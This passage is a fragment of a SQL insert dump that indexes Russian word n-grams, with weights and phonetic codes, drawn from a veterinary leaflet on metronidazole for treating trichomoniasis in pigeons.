восстановлении','в биохимическом восстановлении',0,1,2,'в000',1,'*'),(1554043,'в ветеринарной','в ветеринарной',0,1,1.4667,'в000',1,'*'),(1554044,'в ветеринарной медицине','в ветеринарной медицине',0,1,1.7667,'в000',1,'*'),(1554045,'в дозе','в дозе',0,1,1.2,'в000',2,'*'),(1554046,'в дозе 50','в дозе 50',0,1,1.3,'в000',1,'*'),(1554047,'в з','в з',0,1,1.1,'в000',1,'*'),(1554048,'в з раза','в з раза',0,1,1.2667,'в000',1,'*'),(1554049,'в концентрации','в концентрации',0,1,1.4667,'в000',2,'*'),(1554050,'в концентрации 0,05','в концентрации 0,05',0,1,1.6333,'в000',1,'*'),(1554051,'в расчете','в расчете',0,1,1.3,'в000',1,'*'),(1554052,'в расчете на','в расчете на',0,1,1.4,'в000',1,'*'),(1554053,'ведет','ведет',0,0,0.3333,'в000',1,'*'),(1554054,'ведет к','ведет к',0,1,1.2333,'в000',1,'*'),(1554055,'ведет к гибели','ведет к гибели',0,1,1.4667,'в000',1,'*'),(1554056,'ветеринарной','ветеринарной',0,0,0.8,'в000',1,'*'),(1554057,'ветеринарной медицине','ветеринарной медицине',0,1,1.7,'в000',1,'*'),(1554058,'ветеринарной медицине производитель','ветеринарной медицине производитель',0,1,2,'в000',1,'*'),(1554059,'вещества','вещества',0,0,0.5333,'в000',1,'*'),(1554060,'вещества ангидрид','вещества ангидрид',0,1,1.5667,'в000',1,'*'),(1554061,'вещества ангидрид лимонной','вещества ангидрид лимонной',0,1,1.8667,'в000',1,'*'),(1554062,'вещество','вещество',0,0,0.5333,'в000',1,'*'),(1554063,'вещество метронидазол','вещество метронидазол',0,1,1.7,'в000',1,'*'),(1554064,'вещество метронидазол 20,0','вещество метронидазол 20,0',0,1,1.8667,'в000',1,'*'),(1554065,'взаимодействует','взаимодействует',0,0,1,'в000',1,'*'),(1554066,'взаимодействует с','взаимодействует с',0,1,1.5667,'в000',1,'*'),(1554067,'взаимодействует с днк','взаимодействует с днк',0,1,1.7,'в000',1,'*'),(1554068,'вкуса','вкуса',0,0,0.3333,'в000',1,'*'),(1554069,'вкуса состав','вкуса состав',0,1,1.4,'в000',1,'*'),(1554070,'вкуса состав 100','вкуса состав 100',0,1,1.5333,'в000',1,'*'),(1554071,'внимание','внимание',0,0,0.5333,'в000',1,'*'),(1554072,'внимание не','внимание не',0,1,1.3667,'в000',1,'*'),(1554073,'внимание не применять','внимание не применять',0,1,1.7,'в000',1,'*'),(1554074,'внутриклеточными','внутриклеточными',0,0,1,'в000',1,'*'),(1554075,'внутриклеточными транспортными','внутриклеточными транспортными',0,1,2,'в000',1,'*'),(1554076,'внутриклеточными транспортными протеинами','внутриклеточными транспортными протеинами',0,1,2,'в000',1,'*'),(1554077,'водой','водой',0,0,0.3333,'в000',1,'*'),(1554078,'водой профилактически','водой профилактически',0,1,1.7,'в000',1,'*'),(1554079,'водой профилактически применяют','водой профилактически применяют',0,1,2,'в000',1,'*'),(1554080,'воды','воды',0,0,0.2667,'в000',1,'*'),(1554081,'воды а','воды а',0,1,1.2,'в000',1,'*'),(1554082,'воды а лечебно','воды а лечебно',0,1,1.4667,'в000',1,'*'),(1554083,'воды препарат','воды препарат',0,1,1.4333,'в000',1,'*'),(1554084,'воды препарат применяют','воды препарат применяют',0,1,1.7667,'в000',1,'*'),(1554085,'восстановлении','восстановлении',0,0,0.9333,'в000',1,'*'),(1554086,'восстановлении 5-нитрогруппы','восстановлении 5-нитрогруппы',0,1,1.9333,'в000',1,'*'),(1554087,'восстановлении 5-нитрогруппы метронидазола','восстановлении 5-нитрогруппы метронидазола',0,1,2,'в000',1,'*'),(1554088,'восстановленная','восстановленная',0,0,1,'в000',1,'*'),(1554089,'восстановленная 5-нітрогруппа','восстановленная 5-нітрогруппа',0,1,1.9667,'в000',1,'*'),(1554090,'восстановленная 5-нітрогруппа метронидазола','восстановленная 5-нітрогруппа метронидазола',0,1,2,'в000',1,'*'),(1554091,'вспомогательные','вспомогательные',0,0,1,'в000',1,'*'),(1554092,'вспомогательные вещества','вспомогательные вещества',0,1,1.8,'в000',1,'*'),(1554093,'вспомогательные вещества ангидрид','вспомогательные вещества ангидрид',0,1,2,'в000',1,'*'),(1554094,'вызванный','вызванный',0,0,0.6,'в000',1,'*'),(1554095,'вызванный микроорганизмами','вызванный микроорганизмами',0,1,1.8667,'в000',1,'*'),(1554096,'вызванный микроорганизмами чувствительными','вызванный микроорганизмами чувствительными',0,1,2,'в000',1,'*'),(1554097,'выпуска','выпуска',0,0,0.4667,'в000',1,'*'),(1554098,'выпуска пакеты','выпуска пакеты',0,1,1.4667,'в000',1,'*'),(1554099,'выпуска пакеты из','выпуска пакеты из',0,1,1.5667,'в000',1,'*'),(1554100,'г вспомогательные','г вспомогательные',0,1,1.5667,'г000',1,'*'),(1554101,'г вспомогательные вещества','г вспомогательные вещества',0,1,1.8667,'г000',1,'*'),(1554102,'г препарата','г препарата',0,1,1.3667,'г000',1,'*'),(1554103,'г препарата на','г препарата на',0,1,1.4667,'г000',1,'*'),(1554104,'г препарата растворенного','г препарата растворенного',0,1,1.8333,'г000',1,'*'),(1554105,'г препарата содержит','г препарата содержит',0,1,1.6667,'г000',1,'*'),(1554106,'г хранение','г хранение',0,1,1.3333,'г000',1,'*'),(1554107,'г хранение сухое','г хранение сухое',0,1,1.5333,'г000',1,'*'),(1554108,'гибели','гибели',0,0,0.4,'г000',1,'*'),(1554109,'гибели микроорганизма','гибели микроорганизма',0,1,1.7,'г000',1,'*'),(1554110,'гибели микроорганизма эффективен','гибели микроорганизма эффективен',0,1,2,'г000',1,'*'),(1554111,'года','года',0,0,0.2667,'г000',1,'*'),(1554112,'года для','года для',0,1,1.2667,'г000',1,'*'),(1554113,'года для применения','года для применения',0,1,1.6333,'г000',1,'*'),(1554114,'годности','годности',0,0,0.5333,'г000',1,'*'),(1554115,'годности 2','годности 2',0,1,1.3333,'г000',1,'*'),(1554116,'годности 2 года','годности 2 года',0,1,1.5,'г000',1,'*'),(1554117,'голубей','голубей',0,0,0.4667,'г000',1,'*'),(1554118,'голубей больных','голубей больных',0,1,1.5,'г000',1,'*'),(1554119,'голубей больных трихомонадоз','голубей больных трихомонадоз',0,1,1.9333,'г000',1,'*'),(1554120,'голубей предназначенных','голубей предназначенных',0,1,1.7667,'г000',1,'*'),(1554121,'голубей предназначенных для','голубей предназначенных для',0,1,1.9,'г000',1,'*'),(1554122,'грамположительных','грамположительных',0,0,1,'г000',1,'*'),(1554123,'грамположительных бактерий','грамположительных бактерий',0,1,1.8667,'г000',1,'*'),(1554124,'грамположительных бактерий eubacterium','грамположительных бактерий eubacterium',0,1,2,'г12365',1,'*'),(1554125,'гранулят','гранулят',0,0,0.5333,'г000',1,'*'),(1554126,'гранулят кисло-горького','гранулят кисло-горького',0,1,1.7667,'г000',1,'*'),(1554127,'гранулят кисло-горького вкуса','гранулят кисло-горького вкуса',0,1,1.9667,'г000',1,'*'),(1554128,'группе','группе',0,0,0.4,'г000',1,'*'),(1554129,'группе 5-нитроимидазола','группе 5-нитроимидазола',0,1,1.7667,'г000',1,'*'),(1554130,'группе 5-нитроимидазола механизм','группе 5-нитроимидазола механизм',0,1,2,'г000',1,'*'),(1554131,'действия','действия',0,0,0.5333,'д000',3,'*'),(1554132,'действия метронидазола','действия метронидазола',0,1,1.7333,'д000',1,'*'),(1554133,'действия метронидазола заключается','действия метронидазола заключается',0,1,2,'д000',1,'*'),(1554134,'действующее','действующее',0,0,0.7333,'д000',1,'*'),(1554135,'действующее вещество','действующее вещество',0,1,1.6667,'д000',1,'*'),(1554136,'действующее вещество метронидазол','действующее вещество метронидазол',0,1,2,'д000',1,'*'),(1554137,'детей','детей',0,0,0.3333,'д000',1,'*'),(1554138,'детей место','детей место',0,1,1.3667,'д000',1,'*'),(1554139,'детей место при','детей место при',0,1,1.5,'д000',1,'*'),(1554140,'для голубей','для голубей',0,1,1.3667,'д000',1,'*'),(1554141,'для голубей предназначенных','для голубей предназначенных',0,1,1.9,'д000',1,'*'),(1554142,'для детей','для детей',0,1,1.3,'д000',1,'*'),(1554143,'для детей место','для детей место',0,1,1.5,'д000',1,'*'),(1554144,'для забоя','для забоя',0,1,1.3,'д000',1,'*'),(1554145,'для забоя на','для забоя на',0,1,1.4,'д000',1,'*'),(1554146,'для применения','для применения',0,1,1.4667,'д000',1,'*'),(1554147,'для применения в','для применения в',0,1,1.5333,'д000',1,'*'),(1554148,'днк','днк',0,0,0.2,'д000',1,'*'),(1554149,'днк микробной','днк микробной',0,1,1.4333,'д000',1,'*'),(1554150,'днк микробной клетки','днк микробной клетки',0,1,1.6667,'д000',1,'*'),(1554151,'дозе','дозе',0,0,0.2667,'д000',2,'*'),(1554152,'дозе 50','дозе 50',0,1,1.2333,'д000',1,'*'),(1554153,'дозе 50 мг','дозе 50 мг',0,1,1.3333,'д000',1,'*'),(1554154,'дозировка','дозировка',0,0,0.6,'д000',1,'*'),(1554155,'дозировка перорально','дозировка перорально',0,1,1.6667,'д000',1,'*'),(1554156,'дозировка перорально в','дозировка перорально в',0,1,1.7333,'д000',1,'*'),(1554157,'дозы','дозы',0,0,0.2667,'д000',1,'*'),(1554158,'дозы 0,15','дозы 0,15',0,1,1.3,'д000',1,'*'),(1554159,'дозы 0,15 75','дозы 0,15 75',0,1,1.4,'д000',1,'*'),(1554160,'ее','ее',0,0,0.1333,'е000',1,'*'),(1554161,'ее нуклеиновых','ее нуклеиновых',0,1,1.4667,'е000',1,'*'),(1554162,'ее нуклеиновых кислот','ее нуклеиновых кислот',0,1,1.7,'е000',1,'*'),(1554163,'з раза','з раза',0,1,1.2,'з000',1,'*'),(1554164,'з раза больше','з раза больше',0,1,1.4333,'з000',1,'*'),(1554165,'забоя','забоя',0,0,0.3333,'з000',1,'*'),(1554166,'забоя на','забоя на',0,1,1.2667,'з000',1,'*'),(1554167,'забоя на м\'ясо','забоя на м',0,1,1.4667,'з000',1,'*'),(1554168,'задаванні','задаванні',0,0,0.6,'з000',1,'*'),(1554169,'задаванні препарата','задаванні препарата',0,1,1.6333,'з000',1,'*'),(1554170,'задаванні препарата с','задаванні препарата с',0,1,1.7,'з000',1,'*'),(1554171,'заключается','заключается',0,0,0.7333,'з000',1,'*'),(1554172,'заключается в','заключается в',0,1,1.4333,'з000',1,'*'),(1554173,'заключается в биохимическом','заключается в биохимическом',0,1,1.9,'з000',1,'*'),(1554174,'и','и',0,0,0.0667,'и000',3,'*'),(1554175,'и 100','и 100',0,1,1.1667,'и000',1,'*'),(1554176,'и 100 г','и 100 г',0,1,1.2333,'и000',1,'*'),(1554177,'и простейших','и простейших',0,1,1.4,'и000',1,'*'),(1554178,'и простейших восстановленная','и простейших восстановленная',0,1,1.9333,'и000',1,'*'),(1554179,'из','из',0,0,0.1333,'и000',2,'*'),(1554180,'из алюминиевой','из алюминиевой',0,1,1.4667,'и000',1,'*'),(1554181,'из алюминиевой фольги','из алюминиевой фольги',0,1,1.7,'и000',1,'*'),(1554182,'или','или',0,0,0.2,'и000',2,'*'),(1554183,'или мелкий','или мелкий',0,1,1.3333,'и000',1,'*'),(1554184,'или мелкий гранулят','или мелкий гранулят',0,1,1.6333,'и000',1,'*'),(1554185,'или светло-желтый','или светло-желтый',0,1,1.5667,'и000',1,'*'),(1554186,'или светло-желтый порошок','или светло-желтый порошок',0,1,1.8333,'и000',1,'*'),(1554187,'к','к',0,0,0.0667,'к000',2,'*'),(1554188,'к гибели','к гибели',0,1,1.2667,'к000',1,'*'),(1554189,'к гибели микроорганизма','к гибели микроорганизма',0,1,1.7667,'к000',1,'*'),(1554190,'к группе','к группе',0,1,1.2667,'к000',1,'*'),(1554191,'к группе 5-нитроимидазола','к группе 5-нитроимидазола',0,1,1.8333,'к000',1,'*'),(1554192,'к метронидазолу','к метронидазолу',0,1,1.5,'к000',1,'*'),(1554193,'к метронидазолу внимание','к метронидазолу внимание',0,1,1.8,'к000',1,'*'),(1554194,'к метронидазолу дозировка','к метронидазолу дозировка',0,1,1.8333,'к000',1,'*'),(1554195,'кг корма','кг корма',0,1,1.2667,'к000',1,'*'),(1554196,'кг корма при','кг корма при',0,1,1.4,'к000',1,'*'),(1554197,'кг корма с','кг корма с',0,1,1.3333,'к000',1,'*'),(1554198,'кг массы','кг массы',0,1,1.2667,'к000',2,'*'),(1554199,'кг массы тела','кг массы тела',0,1,1.4333,'к000',2,'*'),(1554200,'кисло-горького','кисло-горького',0,0,0.9333,'к000',1,'*'),(1554201,'кисло-горького вкуса','кисло-горького вкуса',0,1,1.6667,'к000',1,'*'),(1554202,'кисло-горького вкуса состав','кисло-горького вкуса состав',0,1,1.9,'к000',1,'*'),(1554203,'кислот','кислот',0,0,0.4,'к000',1,'*'),(1554204,'кислот что','кислот что',0,1,1.3333,'к000',1,'*'),(1554205,'кислот что ведет','кислот что ведет',0,1,1.5333,'к000',1,'*'),(1554206,'кислоты','кислоты',0,0,0.4667,'к000',1,'*'),(1554207,'кислоты фармакологические','кислоты фармакологические',0,1,1.8333,'к000',1,'*'),(1554208,'кислоты фармакологические свойства','кислоты фармакологические свойства',0,1,2,'к000',1,'*'),(1554209,'клетки','клетки',0,0,0.4,'к000',1,'*'),(1554210,'клетки інгибіруючи','клетки інгибіруючи',0,1,1.6,'к000',1,'*'),(1554211,'клетки інгибіруючи синтез','клетки інгибіруючи синтез',0,1,1.8333,'к000',1,'*'),(1554212,'концентрации','концентрации',0,0,0.8,'к000',2,'*'),(1554213,'концентрации 0,05','концентрации 0,05',0,1,1.5667,'к000',1,'*'),(1554214,'концентрации 0,05 в','концентрации 0,05 в',0,1,1.6333,'к000',1,'*'),(1554215,'корма','корма',0,0,0.3333,'к000',1,'*'),(1554216,'корма при','корма при',0,1,1.3,'к000',1,'*'),(1554217,'корма при задаванні','корма при задаванні',0,1,1.6333,'к000',1,'*'),(1554218,'корма с','корма с',0,1,1.2333,'к000',1,'*'),(1554219,'корма с лечебной','корма с лечебной',0,1,1.5333,'к000',1,'*'),(1554220,'кормом в','кормом в',0,1,1.2667,'к000',1,'*'),(1554221,'кормом в концентрации','кормом в концентрации',0,1,1.7,'к000',1,'*'),(1554222,'л питьевой','л питьевой',0,1,1.3333,'л000',1,'*'),(1554223,'л питьевой воды','л питьевой воды',0,1,1.5,'л000',1,'*'),(1554224,'лечебно','лечебно',0,0,0.4667,'л000',1,'*'),(1554225,'лечебно раствор','лечебно раствор',0,1,1.5,'л000',1,'*'),(1554226,'лечебно раствор 0,06','лечебно раствор 0,06',0,1,1.6667,'л000',1,'*'),(1554227,'лечебной','лечебной',0,0,0.5333,'л000',1,'*'),(1554228,'лечебной целью','лечебной целью',0,1,1.4667,'л000',1,'*'),(1554229,'лечебной целью применяют','лечебной целью применяют',0,1,1.8,'л000',1,'*'),(1554230,'лечения','лечения',0,0,0.4667,'л000',2,'*'),(1554231,'лечения голубей','лечения голубей',0,1,1.5,'л000',1,'*'),(1554232,'лечения голубей больных','лечения голубей больных',0,1,1.7667,'л000',1,'*'),(1554233,'лимонной','лимонной',0,0,0.5333,'л000',1,'*'),(1554234,'лимонной кислоты','лимонной кислоты',0,1,1.5333,'л000',1,'*'),(1554235,'лимонной кислоты фармакологические','лимонной кислоты фармакологические',0,1,2,'л000',1,'*'),(1554236,'м\'ясо','м',0,0,0.3333,'м000',2,'*'),(1554237,'м\'ясо форма','м форма',0,1,1.3667,'м000',1,'*'),(1554238,'м\'ясо форма выпуска','м форма выпуска',0,1,1.6333,'м000',1,'*'),(1554239,'массы','массы',0,0,0.3333,'м000',2,'*'),(1554240,'массы тела','массы тела',0,1,1.3333,'м000',2,'*'),(1554241,'массы тела с','массы тела с',0,1,1.4,'м000',1,'*'),(1554242,'мг на','мг на',0,1,1.1667,'м000',1,'*'),(1554243,'мг на кг','мг на кг',0,1,1.2667,'м000',1,'*'),(1554244,'медицине','медицине',0,0,0.5333,'м000',1,'*'),(1554245,'медицине производитель','медицине производитель',0,1,1.7333,'м000',1,'*'),(1554246,'медицине производитель pfo','медицине производитель pfo',0,1,1.8667,'м100',1,'*'),(1554247,'мелкий','мелкий',0,0,0.4,'м000',1,'*'),(1554248,'мелкий гранулят','мелкий гранулят',0,1,1.5,'м000',1,'*'),(1554249,'мелкий гранулят кисло-горького','мелкий гранулят кисло-горького',0,1,2,'м000',1,'*'),(1554250,'меньше','меньше',0,0,0.4,'м000',1,'*'),(1554251,'меньше чем','меньше чем',0,1,1.3333,'м000',1,'*'),(1554252,'меньше чем 19','меньше чем 19',0,1,1.4333,'м000',1,'*'),(1554253,'место','место',0,0,0.3333,'м000',1,'*'),(1554254,'место при','место при',0,1,1.3,'м000',1,'*'),(1554255,'место при температуре','место при температуре',0,1,1.7,'м000',1,'*'),(1554256,'метронідазол 20 для','метронідазол 20 для',0,1,1.6333,'м000',1,'*'),(1554257,'метронидазол','метронидазол',0,0,0.8,'м000',1,'*'),(1554258,'метронидазол -25','метронидазол -25',0,1,1.5333,'м000',1,'*'),(1554259,'метронидазол -25 г','метронидазол -25 г',0,1,1.6,'м000',1,'*'),(1554260,'метронидазол 20,0','метронидазол 20,0',0,1,1.5667,'м000',1,'*'),(1554261,'метронидазол 20,0 г','метронидазол 20,0 г',0,1,1.6333,'м000',1,'*'),(1554262,'метронидазол относится','метронидазол относится',0,1,1.7333,'м000',1,'*'),(1554263,'метронидазол относится к','метронидазол относится к',0,1,1.8,'м000',1,'*'),(1554264,'метронидазола','метронидазола',0,0,0.8667,'м000',1,'*'),(1554265,'метронидазола взаимодействует','метронидазола взаимодействует',0,1,1.9667,'м000',1,'*'),(1554266,'метронидазола взаимодействует с','метронидазола взаимодействует с',0,1,2,'м000',1,'*'),(1554267,'метронидазола внутриклеточными','метронидазола внутриклеточными',0,1,2,'м000',1,'*'),(1554268,'метронидазола внутриклеточными транспортными','метронидазола внутриклеточными транспортными',0,1,2,'м000',1,'*'),(1554269,'метронидазола заключается','метронидазола заключается',0,1,1.8333,'м000',1,'*'),(1554270,'метронидазола заключается в','метронидазола заключается в',0,1,1.9,'м000',1,'*'),(1554271,'метронидазолу','метронидазолу',0,0,0.8667,'м000',1,'*'),(1554272,'метронидазолу внимание','метронидазолу внимание',0,1,1.7333,'м000',1,'*'),(1554273,'метронидазолу внимание не','метронидазолу внимание не',0,1,1.8333,'м000',1,'*'),(1554274,'метронидазолу дозировка','метронидазолу дозировка',0,1,1.7667,'м000',1,'*'),(1554275,'метронидазолу дозировка перорально','метронидазолу дозировка перорально',0,1,2,'м000',1,'*'),(1554276,'механизм','механизм',0,0,0.5333,'м000',1,'*'),(1554277,'механизм действия','механизм действия',0,1,1.5667,'м000',1,'*'),(1554278,'механизм действия метронидазола','механизм действия метронидазола',0,1,2,'м000',1,'*'),(1554279,'микробной','микробной',0,0,0.6,'м000',1,'*'),(1554280,'микробной клетки','микробной клетки',0,1,1.5333,'м000',1,'*'),(1554281,'микробной клетки інгибіруючи','микробной клетки інгибіруючи',0,1,1.9333,'м000',1,'*'),(1554282,'микроорганизма','микроорганизма',0,0,0.9333,'м000',1,'*'),(1554283,'микроорганизма эффективен','микроорганизма эффективен',0,1,1.8333,'м000',1,'*'),(1554284,'микроорганизма эффективен против','микроорганизма эффективен против',0,1,2,'м000',1,'*'),(1554285,'микроорганизмами','микроорганизмами',0,0,1,'м000',1,'*'),(1554286,'микроорганизмами чувствительными','микроорганизмами чувствительными',0,1,2,'м000',1,'*'),(1554287,'микроорганизмами чувствительными к','микроорганизмами чувствительными к',0,1,2,'м000',1,'*'),(1554288,'на 10 кг','на 10 кг',0,1,1.2667,'н000',2,'*'),(1554289,'на кг','на кг',0,1,1.1667,'н000',1,'*'),(1554290,'на кг массы','на кг массы',0,1,1.3667,'н000',1,'*'),(1554291,'на м\'ясо','на м',0,1,1.2667,'н000',2,'*'),(1554292,'на м\'ясо форма','на м форма',0,1,1.4667,'н000',1,'*'),(1554293,'на метронидазол','на метронидазол',0,1,1.5,'н000',1,'*'),(1554294,'на метронидазол -25','на метронидазол -25',0,1,1.6333,'н000',1,'*'),(1554295,'не меньше','не меньше',0,1,1.3,'н000',1,'*'),(1554296,'не меньше чем','не меньше чем',0,1,1.4333,'н000',1,'*'),(1554297,'не применять','не применять',0,1,1.4,'н000',1,'*'),(1554298,'не применять для','не применять для',0,1,1.5333,'н000',1,'*'),(1554299,'недоступное','недоступное',0,0,0.7333,'н000',1,'*'),(1554300,'недоступное для','недоступное для',0,1,1.5,'н000',1,'*'),(1554301,'недоступное для детей','недоступное для детей',0,1,1.7,'н000',1,'*'),(1554302,'некоторых','некоторых',0,0,0.6,'н000',1,'*'),(1554303,'некоторых грамположительных','некоторых грамположительных',0,1,1.9,'н000',1,'*'),(1554304,'некоторых грамположительных бактерий','некоторых грамположительных бактерий',0,1,2,'н000',1,'*'),(1554305,'нуклеиновых','нуклеиновых',0,0,0.7333,'н000',1,'*'),(1554306,'нуклеиновых кислот','нуклеиновых кислот',0,1,1.6,'н000',1,'*'),(1554307,'нуклеиновых кислот что','нуклеиновых кислот что',0,1,1.7333,'н000',1,'*'),(1554308,'облигатных','облигатных',0,0,0.6667,'о000',1,'*'),(1554309,'облигатных анаэробных','облигатных анаэробных',0,1,1.7,'о000',1,'*'),(1554310,'облигатных анаэробных бактерий','облигатных анаэробных бактерий',0,1,2,'о000',1,'*'),(1554311,'от','от',0,0,0.1333,'о000',1,'*'),(1554312,'от 18','от 18',0,1,1.1667,'о000',1,'*'),(1554313,'от 18 до','от 18 до',0,1,1.2667,'о000',1,'*'),(1554314,'относится','относится',0,0,0.6,'о000',1,'*'),(1554315,'относится к','относится к',0,1,1.3667,'о000',1,'*'),(1554316,'относится к группе','относится к группе',0,1,1.6,'о000',1,'*'),(1554317,'пакеты','пакеты',0,0,0.4,'п000',1,'*'),(1554318,'пакеты из','пакеты из',0,1,1.3,'п000',1,'*'),(1554319,'пакеты из алюминиевой','пакеты из алюминиевой',0,1,1.7,'п000',1,'*'),(1554320,'перорально в','перорально в',0,1,1.4,'п000',1,'*'),(1554321,'перорально в дозе','перорально в дозе',0,1,1.5667,'п000',1,'*'),(1554322,'питьевой','питьевой',0,0,0.5333,'п000',1,'*'),(1554323,'питьевой водой','питьевой водой',0,1,1.4667,'п000',1,'*'),(1554324,'питьевой водой профилактически','питьевой водой профилактически',0,1,2,'п000',1,'*'),(1554325,'питьевой воды','питьевой воды',0,1,1.4333,'п000',1,'*'),(1554326,'питьевой воды а','питьевой воды а',0,1,1.5,'п000',1,'*'),(1554327,'питьевой воды препарат','питьевой воды препарат',0,1,1.7333,'п000',1,'*'),(1554328,'по 50 и','по 50 и',0,1,1.2333,'п000',1,'*'),(1554329,'повышенная','повышенная',0,0,0.6667,'п000',1,'*'),(1554330,'повышенная чувствительность','повышенная чувствительность',0,1,1.9,'п000',1,'*'),(1554331,'повышенная чувствительность к','повышенная чувствительность к',0,1,1.9667,'п000',1,'*'),(1554332,'порошок или','порошок или',0,1,1.3667,'п000',1,'*'),(1554333,'порошок или мелкий','порошок или мелкий',0,1,1.6,'п000',1,'*'),(1554334,'прапарат','прапарат',0,0,0.5333,'п000',1,'*'),(1554335,'прапарат применяют','прапарат применяют',0,1,1.6,'п000',1,'*'),(1554336,'прапарат применяют с','прапарат применяют с',0,1,1.6667,'п000',1,'*'),(1554337,'предназначенных','предназначенных',0,0,1,'п000',1,'*'),(1554338,'предназначенных для','предназначенных для',0,1,1.6333,'п000',1,'*'),(1554339,'предназначенных для забоя','предназначенных для забоя',0,1,1.8333,'п000',1,'*'),(1554340,'препарат применяют','препарат применяют',0,1,1.6,'п000',1,'*'),(1554341,'препарат применяют не','препарат применяют не',0,1,1.7,'п000',1,'*'),(1554342,'препарата','препарата',0,0,0.6,'п000',1,'*'),(1554343,'препарата на','препарата на',0,1,1.4,'п000',1,'*'),(1554344,'препарата на 10','препарата на 10',0,1,1.5,'п000',1,'*'),(1554345,'препарата растворенного','препарата растворенного',0,1,1.7667,'п000',1,'*'),(1554346,'препарата растворенного в','препарата растворенного в',0,1,1.8333,'п000',1,'*'),(1554347,'препарата с','препарата с',0,1,1.3667,'п000',1,'*'),(1554348,'препарата с питьевой','препарата с питьевой',0,1,1.6667,'п000',1,'*'),(1554349,'препарата содержит','препарата содержит',0,1,1.6,'п000',1,'*'),(1554350,'препарата содержит действующее','препарата содержит действующее',0,1,2,'п000',1,'*'),(1554351,'при задаванні','при задаванні',0,1,1.4333,'п000',1,'*'),(1554352,'при задаванні препарата','при задаванні препарата',0,1,1.7667,'п000',1,'*'),(1554353,'при температуре','при температуре',0,1,1.5,'п000',1,'*'),(1554354,'при температуре от','при температуре от',0,1,1.6,'п000',1,'*'),(1554355,'применение','применение',0,0,0.6667,'п000',2,'*'),(1554356,'применение лечения','применение лечения',0,1,1.6,'п000',1,'*'),(1554357,'применение лечения голубей','применение лечения голубей',0,1,1.8667,'п000',1,'*'),(1554358,'применения','применения',0,0,0.6667,'п000',2,'*'),(1554359,'применения в','применения в',0,1,1.4,'п000',1,'*'),(1554360,'применения в ветеринарной','применения в ветеринарной',0,1,1.8333,'п000',1,'*'),(1554361,'применять','применять',0,0,0.6,'п000',1,'*'),(1554362,'применять для','применять для',0,1,1.4333,'п000',1,'*'),(1554363,'применять для голубей','применять для голубей',0,1,1.7,'п000',1,'*'),(1554364,'применяют','применяют',0,0,0.6,'п000',2,'*'),(1554365,'применяют в','применяют в',0,1,1.3667,'п000',1,'*'),(1554366,'применяют в з','применяют в з',0,1,1.4333,'п000',1,'*'),(1554367,'применяют не','применяют не',0,1,1.4,'п000',1,'*'),(1554368,'применяют не меньше','применяют не меньше',0,1,1.6333,'п000',1,'*'),(1554369,'применяют раствор','применяют раствор',0,1,1.5667,'п000',1,'*'),(1554370,'применяют раствор 0,02','применяют раствор 0,02',0,1,1.7333,'п000',1,'*'),(1554371,'применяют с','применяют с',0,1,1.3667,'п000',1,'*'),(1554372,'применяют с кормом','применяют с кормом',0,1,1.6,'п000',1,'*'),(1554373,'производитель','производитель',0,0,0.8667,'п000',1,'*'),(1554374,'производитель pfo','производитель pfo',0,1,1.5667,'п100',1,'*'),(1554375,'производитель pfo vetos-farma','производитель pfo vetos-farma',0,1,1.9667,'п132165',1,'*'),(1554376,'простейших','простейших',0,0,0.6667,'п000',1,'*'),(1554377,'простейших восстановленная','простейших восстановленная',0,1,1.8667,'п000',1,'*'),(1554378,'простейших восстановленная 5-нітрогруппа','простейших восстановленная 5-нітрогруппа',0,1,2,'п000',1,'*'),(1554379,'протеинами','протеинами',0,0,0.6667,'п000',1,'*'),(1554380,'протеинами анаэробных','протеинами анаэробных',0,1,1.7,'п000',1,'*'),(1554381,'протеинами анаэробных бактерий','протеинами анаэробных бактерий',0,1,2,'п000',1,'*'),(1554382,'против','против',0,0,0.4,'п000',1,'*'),(1554383,'против trichomonas','против trichomonas',0,1,1.6,'п36252',1,'*'),(1554384,'против trichomonas vaginalis','против trichomonas vaginalis',0,1,1.9333,'п3625212542',1,'*'),(1554385,'противопоказания','противопоказания',0,0,1,'п000',2,'*'),(1554386,'противопоказания повышенная','противопоказания повышенная',0,1,1.9,'п000',1,'*'),(1554387,'противопоказания повышенная чувствительность','противопоказания повышенная чувствительность',0,1,2,'п000',1,'*'),(1554388,'профилактически','профилактически',0,0,1,'п000',1,'*'),(1554389,'профилактически применяют','профилактически применяют',0,1,1.8333,'п000',1,'*'),(1554390,'профилактически применяют раствор','профилактически применяют раствор',0,1,2,'п000',1,'*'),(1554391,'профилактическойцелью','профилактическойцелью',0,0,1,'п000',1,'*'),(1554392,'профилактическойцелью прапарат','профилактическойцелью прапарат',0,1,2,'п000',1,'*'),(1554393,'профилактическойцелью прапарат применяют','профилактическойцелью прапарат применяют',0,1,2,'п000',1,'*'),(1554394,'раза','раза',0,0,0.2667,'р000',2,'*'),(1554395,'раза больше','раза больше',0,1,1.3667,'р000',1,'*'),(1554396,'раза больше дозы','раза больше дозы',0,1,1.5333,'р000',1,'*'),(1554397,'раствор','раствор',0,0,0.4667,'р000',2,'*'),(1554398,'раствор 0,02','раствор 0,02',0,1,1.4,'р000',1,'*'),(1554399,'раствор 0,02 10','раствор 0,02 10',0,1,1.5,'р000',1,'*'),(1554400,'раствор 0,06','раствор 0,06',0,1,1.4,'р000',1,'*'),(1554401,'раствор 0,06 30','раствор 0,06 30',0,1,1.5,'р000',1,'*'),(1554402,'растворенного','растворенного',0,0,0.8667,'р000',1,'*'),(1554403,'растворенного в','растворенного в',0,1,1.5,'р000',1,'*'),(1554404,'растворенного в 10','растворенного в 10',0,1,1.6,'р000',1,'*'),(1554405,'расчете','расчете',0,0,0.4667,'р000',1,'*'),(1554406,'расчете на','расчете на',0,1,1.3333,'р000',1,'*'),(1554407,'расчете на метронидазол','расчете на метронидазол',0,1,1.7667,'р000',1,'*'),(1554408,'с днк','с днк',0,1,1.1667,'с000',1,'*'),(1554409,'с днк микробной','с днк микробной',0,1,1.5,'с000',1,'*'),(1554410,'с кормом','с кормом',0,1,1.2667,'с000',2,'*'),(1554411,'с кормом в','с кормом в',0,1,1.3333,'с000',1,'*'),(1554412,'с лечебной','с лечебной',0,1,1.3333,'с000',1,'*'),(1554413,'с лечебной целью','с лечебной целью',0,1,1.5333,'с000',1,'*'),(1554414,'с питьевой','с питьевой',0,1,1.3333,'с000',1,'*'),(1554415,'с питьевой водой','с питьевой водой',0,1,1.5333,'с000',1,'*'),(1554416,'с профилактическойцелью','с профилактическойцелью',0,1,1.7667,'с000',1,'*'),(1554417,'с профилактическойцелью прапарат','с профилактическойцелью прапарат',0,1,2,'с000',1,'*'),(1554418,'с срок','с срок',0,1,1.2,'с000',1,'*'),(1554419,'с срок годности','с срок 